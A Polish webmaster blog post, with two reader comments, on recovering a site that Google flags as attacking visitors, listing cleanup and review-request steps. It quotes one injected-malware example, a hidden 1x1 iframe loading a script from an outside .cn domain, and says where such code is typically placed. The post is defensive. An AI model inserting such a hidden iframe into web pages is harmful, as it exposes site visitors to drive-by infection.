Optymalizacja stron

Witryna zgłoszona jako dokonująca ataków – co robić?

2 komentarze

Czasami zdarza się, że próbując wejść poprzez wyszukiwarkę na naszą stronę widzimy nagle taki oto komunikat na stronie

Czym to zostało spowodowane?

Taka sytuacja związana jest z faktem, że ktoś się włamał się na nasz serwer u umieścił na stronie złośliwy kod. Z reguły został on umieszczany w pliku index.html/index.php i wygląda np. tak <iframe src=”http://bestlotron.cn/in.cgi?cocacola60″ width=1 height=1 style=”visibility: hidden”></iframe> – lub jest to jakiś javascript. Taki kod znajduje się on zazwyczaj zaraz za znacznikiem <body> lub przed </body> pliku HTML, w przypadku pliku PHP często na końcu pliku .

Google, dbając o bezpieczeństwo innych użytkowników Internetu poprzez wyświetlenie tego komunikatu zwraca im uwagę na to, że wejście na stronę „odbędzie” się na wyraźne „życzenie” internauty, ponieważ istnieje duże ryzyko zainfekowania komputera osoby, która będzie próbowała wejść, mimo ostrzeżenia, na taką stronę.

Oczywiście, nie oznacza to, że nasza strona już zawsze zostanie „napiętnowana”. Należy szybko sprawę wyjaśnić, i w tym celu:

1) W pierwszej kolejności – należy zmienić dane logowania do serwera i do strony; jeżeli są one zapisane w FTPie – skasuj je.

2) następnie należy usunąć ze strony złośliwy kod

3) Przeskanować komputer i pliki na serwerze dobrym programem antywirusowym

4) następnie należy się zalogować do Narzędzi dla Webmasterów, dodać swoją witrynę, zweryfikować ją – i kliknąć w link,  znajdujący się po lewej stronie, o powtórnym rozpatrzeniu strony. Z listy należy wybrać adres zainfekowanej strony (jak mamy zgłoszonych kilka witryn w Narzędziach), napisać KRÓTKO po polsku (nie lać wody) co się stało, razem z informacją, że złośliwy kod został już usunięty ze strony – i … po wysłaniu wniosku cierpliwie poczekać – z reguły do 24 godzin strona powinna być już dostępna , o ile zostały z niej usunięte wszystkie złośliwe kody, jakie zostały dopisane w wyniku włamania do kodu źródłowego naszej witryny.

Warto wiedzieć, że pod adresem http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site= (po znaku równości wpisujemy adres zainfekowanej witryny), można na bieżąco sprawdzać, czy nasza strona jest czysta, kiedy została ostatnio zainfekowana itp. Zachęcam do wpisania adresu swojej witryny i przetestowania :)

GD Star Rating
loading...
Witryna zgłoszona jako dokonująca ataków - co robić?, Witryna zgłoszona jako dokonująca ataków - co robić?, 9.5 out of 10 based on 6 ratings Witryna zgłoszona jako dokonująca ataków - co robić?
autor 1407 artykułów opublikowanych na blogu

Jako właściciel firmy SEOProfi pomaga zwiększać sprzedaż w sklepach internetowych oraz ruch na stronach firmowych na rynku polsko-, anglo- oraz niemieckojęzycznym.

Bloga założył w 2010 widząc ogrom problemów, z jakimi mają do czynienia osoby próbujące samodzielnie wypromować stronę w Google. Od 2011 roku jako Product Expert pomaga rozwiązywać te problemy na oficjalnym Forum Pomocy Google dla Webmasterów.


Chcesz zwiększyć widoczność Twojej strony w Google?

Tak, chcę >>


Opinie i Komentarze

Colin 14 lipca 2010, 13:34

A gdy zweryfikowanie w narzędziach Google dla webmasterów jest niemożliwe, należy użyć http://stopbadware.org/home/reportsearch, po wyszukaniu domeny link „Request an independent review of partners’ findings”.

Michal 27 marca 2017, 9:58

Bardzo pomocny artykul, dziekuje

Skomentuj

Twój adres e-mail nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

Inne wpisy z tej kategorii